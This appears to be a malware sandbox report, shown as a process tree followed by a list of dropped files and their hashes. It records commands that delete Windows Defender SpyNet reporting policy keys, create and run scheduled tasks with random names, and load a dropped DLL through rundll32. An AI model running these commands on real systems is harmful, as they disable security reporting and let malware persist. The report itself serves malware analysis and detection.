- Drops file in Windows directory
- Creates scheduled task(s)
PID:3068
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "UHTTgbauCkoiRQjtd"3⤵PID:2112
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1780
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:2296
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:2576
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:2700
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "RdLmjNtWjKxsLsIur"3⤵PID:2820
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\tSkdRfYqneaszoCN\ULItknQf\JvWNTFL.dll",#1 /Gbsite_idrqH 3851182⤵PID:1564
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\tSkdRfYqneaszoCN\ULItknQf\JvWNTFL.dll",#1 /Gbsite_idrqH 3851183⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2260 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "UHTTgbauCkoiRQjtd"4⤵PID:2704
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1616
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2168
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2356
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD50d31445943e7367cb74c3693715c0215
SHA1467734413bd00f8fe3e3a65a96dd5ced2b0666ff
SHA256c119395a7e3e87c372a62af49c53d1c195db1aee48f76016a802864201ea56a1
SHA5123106cd7bf257f473fee51e290b617845d3a2bfee20d3e8ba8fce64937b1d69c27c9ae156e941c41b2a2ac686a825614ceaf609c5e75a9222b674decd1e12be66
-
Filesize
2KB
MD5ff221e87390cdd088d90a6140cd294c0
SHA13194649087911a1213eb2f88d485cf82d9db4e2c
SHA256351af27956aec71072dd2617c6cff86bfec7a3b7d016caed6c3c41e45529ffb4
SHA512603b60e1462c64755a8b21d115e4d249a758745f790a21106bb02ebf974c3aa4be0657f435932854d93e6a933edef2a525938fcbe7fca113b602001eeb969029
-
Filesize
2KB
MD5bd7308b48adc6e369083cb85731886e2
SHA16f0fa5b0bd2ecfd0f6cf5914cc538059f1b80249
SHA256d7726132abac934d2e66a9e4490b234d48a7e15f751191d0597be1acbb45cbb0
SHA51249f45e2348479ba74e1f20f3cc031985a3995f80ff8954257b6425af3e4563d1448c7d1d3afcc4bcd1c070c30725a774ff5fb1aea23a281567de34f9b141b9b2
-
Filesize
2KB
MD5aa554f48af104dd3fb516722ad12a035
SHA18bcb9a4205af07d43de5534f773438df4161f9e6
SHA256876c4192076ccf66a9a01ec9f739a35ed618d374668aea25cbb75d211d777fc0
SHA5121f249014c35290e509dd95a177e07f11014fceced63b9bed203bb99bb35ac1e0d8efd462ec6b2e27af38b68e40e6608ea94fa52abc03e97a77e660f1567be6b0
-
Filesize
1.5MB
MD570cf823860300758e2cf53aa66a6685e
SHA151226463ef74ba661f2f93ae1b44e52912ccbbc2
SHA256aa76d88c190ec139b36be0d71645fe01ca220893a2319342f8c1587e0dbe12c6
SHA5128b1aa7efe7b98434bdce409e27eabf74553ce28a7ba652a7997dff0d250372ea0a3c19fa3b75e149f6e366331b98696b84a40019f1b0cc6c31aca6d1900b9bea
-
Filesize
2KB
MD52159e2af16678b8278e122a528554bc2
SHA1c1c9126ae96ffb613e3cda5f5b0d202109acea6d
SHA25635e1459c3fe2f888f7794f617d5d07aebde564d8e2d7bb75e19a535df63663c0
SHA5121870fb9d3d51dda77bbf14a84c765abfa90b410466eda65a9d90c2adbaa3e4e9d9873da213a9bc81d6d2785a9661ab5a3cf736e364bf545591d03901b6d5a68a
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
8KB
MD529237eb570f851524a92e35c916f1c73
SHA175b9199eac28368a209e032d8e99cd166e9f8f0e
SHA256435bc6a393af83fe5a887ee6d404a3c4c3d05374e325c68de9cccb72cca53715
SHA5129497a01c40abac2ea536bd9b8f599f17dbda7cbcba9151f85ff76ea8db4447d5f8263f96a6da9791c048fe4069c5ba45072e06766bd0819e28c102f5fc6ad5e9
-
Filesize
6.1MB
MD5409876b3a178b12ea5f2c98aa937a232
SHA1b53bac62a2185e4407a551882d54ebc66536d261
SHA256e8d7fc009314cf912ead7272ae6cf71d1f4352e44c2bf8550a9e7adcc9913dca
SHA5123fe47f1ee7942b10f1d963c50702c3327f5a007010b104048a42f5224cb75a98a165b0afdc50c0dc8c2c6b644c960fc36dedd64a0c133f00bd191558573a68a5
-
Filesize
6.1MB
MD5409876b3a178b12ea5f2c98aa937a232
SHA1b53bac62a2185e4407a551882d54ebc66536d261
SHA256e8d7fc009314cf912ead7272ae6cf71d1f4352e44c2bf8550a9e7adcc9913dca
SHA5123fe47f1ee7942b10f1d963c50702c3327f5a007010b104048a42f5224cb75a98a165b0afdc50c0dc8c2c6b644c960fc36dedd64a0c133f00bd191558573a68a5
-
Filesize
6.6MB
MD5af188e26b0786fb911f984889bdf126e
SHA170973ff76eea96e225426f3d8ead18e8a2201b37
SHA256b964a966c1bf0a0dd8cd2dc8d376b33c990cc4777e890e85e7247c2122f80e06
SHA5124fdba1946c85dee1b68676af141808b0ba7c341fa23ff4a90950e67fb63080eaad361a35cf7945e1a5849cdd976d1878015d45a939add6faa926c74d60ff956f
-
Filesize
6.6MB
MD5af188e26b0786fb911f984889bdf126e
SHA170973ff76eea96e225426f3d8ead18e8a2201b37
SHA256b964a966c1bf0a0dd8cd2dc8d376b33c990cc4777e890e85e7247c2122f80e06
SHA5124fdba1946c85dee1b68676af141808b0ba7c341fa23ff4a90950e67fb63080eaad361a35cf7945e1a5849cdd976d1878015d45a939add6faa926c74d60ff956f
-
Filesize
6.6MB
MD5af188e26b0786fb911f984889bdf126e
SHA170973ff76eea96e225426f3d8ead18e8a2201b37
SHA256b964a966c1bf0a0dd8cd2dc8d376b33c990cc4777e890e85e7247c2122f80e06
SHA5124fdba1946c85dee1b68676af141808b0ba7c341fa23ff4a90950e67fb63080eaad361a35cf7945e1a5849cdd976d1878015d45a939add6faa926c74d60ff956f
-
Filesize
6.6MB
MD5af188e26b0786fb911f984889bdf126e
SHA170973ff76eea96e225426f3d8ead18e8a2201b37
SHA256b964a966c1bf0a0dd8cd2dc8d376b33c990cc4777e890e85e7247c2122f80e06
SHA5124fdba1946c85dee1b68676af141808b0ba7c341fa23ff4a90950e67fb63080eaad361a35cf7945e1a5849cdd976d1878015d45a939add6faa926c74d60ff956f
-
Filesize
6.6MB
MD5af188e26b0786fb911f984889bdf126e
SHA170973ff76eea96e225426f3d8ead18e8a2201b37
SHA256b964a966c1bf0a0dd8cd2dc8d376b33c990cc4777e890e85e7247c2122f80e06
SHA5124fdba1946c85dee1b68676af141808b0ba7c341fa23ff4a90950e67fb63080eaad361a35cf7945e1a5849cdd976d1878015d45a939add6faa926c74d60ff956f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD53642fac6e9e621df8a2d39ffaea40ef7
SHA1c8bf2a2e8a731374339c58899c0609402dda193c
SHA256405e67aeb28fc1c1d06a6b84dccda6b2e3f6d2a31838cd9a0f59680a962bb768
SHA5125301b2772e04825a9635a87d4c09c11ffe763a9078c6da299443662fbb18ef85cd47f344ec384378b4ea6b5f7a9824eed6e03ef18ff4900b78c8daf2cf1acbcf
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5bafac89fe6227b7274d7b320674feda7
SHA1552984b44adaf241767b167b6246c0991b06c9a1
SHA256bf76b5b0aa1c55ed4a1ef496550a3d6dc56954887915dd8f64b52a11544c753b
SHA512680bd3444d1be43120c2cca6d39f69eeadf30fce5b90db505dff215510938356b7fa3ffb7f910cc8c5d542170442eb8708d6241790078860032e86eb21642747
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD53b5d402ccccbdcc36ba94f565cebeadc
SHA141503cbcfe7ec654195d7c4d79b2791282865721
SHA25631012b0c775eb87b920d2a3ca1ba3d05a698b64df8fbd0aa2a390f4993295b7b
SHA512173d37354d974f0830de887c1e3209632f0b94b88f68b687accb50113f097717ca2eb78f86617d2bce5854457686f07410384aeaae81fa25a3488b73a455140e
-
Filesize
7KB
MD581adbedb6baf82c61b0ac94138630cd9
SHA11aff27793391b0e321c3b1dcac6d59a2a8ec63b6
SHA2563b7bb651e04acc048d78988b3253323ef3a133621bbf41062e9a298e216b9618
SHA51250dfc7cc83a93bd261e98562626396354670f003392e5fca0a636fac5015dc2c9bd6687663ca4cadebd836154f7496adc205c2b0ff53c35e600aaa4a3952c8bf
-
Filesize
6.1MB
MD578d75647e4b5cd639c4d0d6ef3d788bd
SHA159e8c4c88d153a8884bb934c52806ba2f266d477
SHA2564291eb1f323d0aaacae6cad0a734da1f8c504331dbb26459723f1627f3310fee
SHA512078fbcfefafc273fae8dc587ad20290bec4a94dd52848e227c776ac856f35fb50bcd2c8355175ed601055cbcaef518fe9ff0d449a2284827c01fbde65c69332b
-
Filesize
6.6MB
MD5af188e26b0786fb911f984889bdf126e
SHA170973ff76eea96e225426f3d8ead18e8a2201b37
SHA256b964a966c1bf0a0dd8cd2dc8d376b33c990cc4777e890e85e7247c2122f80e06
SHA5124fdba1946c85dee1b68676af141808b0ba7c341fa23ff4a90950e67fb63080eaad361a35cf7945e1a5849cdd976d1878015d45a939add6faa926c74d60ff956f
-
Filesize
6.6MB
MD5af188e26b0786fb911f984889bdf126e
SHA170973ff76eea96e225426f3d8ead18e8a2201b37
SHA256b964a966c1bf0a0dd8cd2dc8d376b33c990cc4777e890e85e7247c2122f80e06
SHA5124fdba1946c85dee1b68676af141808b0ba7c341fa23ff4a90950e67fb63080eaad361a35cf7945e1a5849cdd976d1878015d45a939add6faa926c74d60ff956f
-
Filesize
9KB
MD5f727b9b15448346f9837b3fda185d7ae
SHA1cb4ae2fa644efa1e4275b7548b986a3b3ec18559
SHA256d3a0dfca12825d02be1a520ba81d1a339b54f4996bb8a8c684c86e1583447c29
SHA512d9520cbc3089fb73396ed2218372bf6db55b47804d23d577bd8eee99f7910adc923ce3ba03d5b034e7d193f061ad0cf2f02f0caa67dee66d60cea9df484b6328
-
Filesize
6KB
MD5b02197363c7763b66b7ece8e6c472206
SHA18ab1b6d1631d414b27f816e2618fc3ae5db66f86
SHA256ac163f749738a06eab937de9fa5434240abb2c09cd7d98e6b27c0354526bb135
SHA512f34b74c2b630b1402836e478fb3f06eb9716b07ba6e4e744a58cfc89d7f1fd78e2d8f6ca2fba48ace0f264f4512cee2507dec19dcdc08edbab2c290be9e23603
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.1MB
MD5409876b3a178b12ea5f2c98aa937a232
SHA1b53bac62a2185e4407a551882d54ebc66536d261
SHA256e8d7fc009314cf912ead7272ae6cf71d1f4352e44c2bf8550a9e7adcc9913dca
SHA5123fe47f1ee7942b10f1d963c50702c3327f5a007010b104048a42f5224cb75a98a165b0afdc50c0dc8c2c6b644c960fc36dedd64a0c133f00bd191558573a68a5
-
Filesize
6.1MB
MD5409876b3a178b12ea5f2c98aa937a232
SHA1b53bac62a2185e4407a551882d54ebc66536d261
SHA256e8d7fc009314cf912ead7272ae6cf71d1f4352e44c2bf8550a9e7adcc9913dca
SHA5123fe47f1ee7942b10f1d963c50702c3327f5a007010b104048a42f5224cb75a98a165b0afdc50c0dc8c2c6b644c960fc36dedd64a0c133f00bd191558573a68a5
-
Filesize
6.1MB
MD5409876b3a178b12ea5f2c98aa937a232
SHA1b53bac62a2185e4407a551882d54ebc66536d261
SHA256e8d7fc009314cf912ead7272ae6cf71d1f4352e44c2bf8550a9e7adcc9913dca
SHA5123fe47f1ee7942b10f1d963c50702c3327f5a007010b104048a42f5224cb75a98a165b0afdc50c0dc8c2c6b644c960fc36dedd64a0c133f00bd191558573a68a5
-
Filesize
6.1MB
MD5409876b3a178b12ea5f2c98aa937a232
SHA1b53bac62a2185e4407a551882d54ebc66536d261
SHA256e8d7fc009314cf912ead7272ae6cf71d1f4352e44c2bf8550a9e7adcc9913dca
SHA5123fe47f1ee7942b10f1d963c50702c3327f5a007010b104048a42f5224cb75a98a165b0afdc50c0dc8c2c6b644c960fc36dedd64a0c133f00bd191558573a68a5
-
Filesize
6.6MB
MD5af188e26b0786fb911f984889bdf126e
SHA170973ff76eea96e225426f3d8ead18e8a2201b37
SHA256b964a966c1bf0a0dd8cd2dc8d376b33c990cc4777e890e85e7247c2122f80e06
SHA5124fdba1946c85dee1b68676af141808b0ba7c341fa23ff4a90950e67fb63080eaad361a35cf7945e1a5849cdd976d1878015d45a939add6faa926c74d60ff956f
-
Filesize
6.6MB
MD5af188e26b0786fb911f984889bdf126e
SHA170973ff76eea96e225426f3d8ead18e8a2201b37
SHA256b964a966c1bf0a0dd8cd2dc8d376b33c990cc4777e890e85e7247c2122f80e06
SHA5124fdba1946c85dee1b68676af141808b0ba7c341fa23ff4a90950e67fb63080eaad361a35cf7945e1a5849cdd976d1878015d45a939add6faa926c74d60ff956f
-
Filesize
6.6MB
MD5af188e26b0786fb911f984889bdf126e
SHA170973ff76eea96e225426f3d8ead18e8a2201b37
SHA256b964a966c1bf0a0dd8cd2dc8d376b33c990cc4777e890e85e7247c2122f80e06
SHA5124fdba1946c85dee1b68676af141808b0ba7c341fa23ff4a90950e67fb63080eaad361a35cf7945e1a5849cdd976d1878015d45a939add6faa926c74d60ff956f
-
Filesize
6.6MB
MD5af188e26b0786fb911f984889bdf126e
SHA170973ff76eea96e225426f3d8ead18e8a2201b37
SHA256b964a966c1bf0a0dd8cd2dc8d376b33c990cc4777e890e85e7247c2122f80e06
SHA5124fdba1946c85dee1b68676af141808b0ba7c341fa23ff4a90950e67fb63080eaad361a35cf7945e1a5849cdd976d1878015d45a939add6faa926c74d60ff956f
-
Filesize
6.1MB
MD578d75647e4b5cd639c4d0d6ef3d788bd
SHA159e8c4c88d153a8884bb934c52806ba2f266d477
SHA2564291eb1f323d0aaacae6cad0a734da1f8c504331dbb26459723f1627f3310fee
SHA512078fbcfefafc273fae8dc587ad20290bec4a94dd52848e227c776ac856f35fb50bcd2c8355175ed601055cbcaef518fe9ff0d449a2284827c01fbde65c69332b
-
Filesize
6.1MB
MD578d75647e4b5cd639c4d0d6ef3d788bd
SHA159e8c4c88d153a8884bb934c52806ba2f266d477
SHA2564291eb1f323d0aaacae6cad0a734da1f8c504331dbb26459723f1627f3310fee
SHA512078fbcfefafc273fae8dc587ad20290bec4a94dd52848e227c776ac856f35fb50bcd2c8355175ed601055cbcaef518fe9ff0d449a2284827c01fbde65c69332b
-
Filesize
6.1MB
MD578d75647e4b5cd639c4d0d6ef3d788bd
SHA159e8c4c88d153a8884bb934c52806ba2f266d477
SHA2564291eb1f323d0aaacae6cad0a734da1f8c504331dbb26459723f1627f3310fee
SHA512078fbcfefafc273fae8dc587ad20290bec4a94dd52848e227c776ac856f35fb50bcd2c8355175ed601055cbcaef518fe9ff0d449a2284827c01fbde65c69332b
-
Filesize
6.1MB
MD578d75647e4b5cd639c4d0d6ef3d788bd
SHA159e8c4c88d153a8884bb934c52806ba2f266d477
SHA2564291eb1f323d0aaacae6cad0a734da1f8c504331dbb26459723f1627f3310fee
SHA512078fbcfefafc273fae8dc587ad20290bec4a94dd52848e227c776ac856f35fb50bcd2c8355175ed601055cbcaef518fe9ff0d449a2284827c01fbde65c69332b